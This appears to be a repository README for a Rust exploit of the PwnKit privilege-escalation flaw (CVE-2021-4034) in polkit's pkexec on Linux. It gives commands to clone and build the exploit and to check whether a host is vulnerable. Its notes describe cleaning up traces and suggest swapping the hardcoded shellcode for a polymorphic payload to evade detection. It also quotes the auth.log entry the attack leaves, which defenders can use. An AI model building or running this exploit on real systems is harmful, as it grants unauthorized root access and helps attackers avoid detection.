Linux LPE using polkit-1 written in Rust.
Install rust if you haven't already
git clone https://github.com/deoxykev/CVE-2021-4034-Rust
cd CVE-2021-4034-Rust
rustup target add x86_64-unknown-linux-musl
cargo build --release
# check for pkexec
which pkexec || echo not vuln
# check suid permissions on pkexec
stat -c '%a' $(which pkexec) | grep -q 4755 || echo not vuln
# check patch date on pkexec
stat -c '%y' $(which pkexec)
# dates before 2022-01-12 may be unpatched & vulnerable
- Writes exploit files to /dev/shm (ramdisk)
- delete randomly generated directory afterwards
- can be detected on file creation
- shellcode is hardcoded, consider replacing with a polymorphic payload (ie: msfvenom output)
- syscall to pkexec with null args can be detected
- pkexec logs are visible in
/var/log/auth.log
pkexec[121401]: user: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/8] [CWD=/dev/shm/YWdQYnE3TSNlwNKMXEwYcGRVmdYipb] [COMMAND=GCONV_PATH=./tSq82ptZaDiyXWZz0BOybdH9fINqCG PATH=GCONV_PATH=. CHARSET=mgELtKAB9sXo0a9KJk00NNO0wa4x0J SHELL=mgELtKAB9sXo0a9KJk00NNO0wa4x0J]
vuln disclosure - qualsys research team - https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 shellcode - @johkrupp - https://saarsec.rocks/2020/05/14/golf.so.html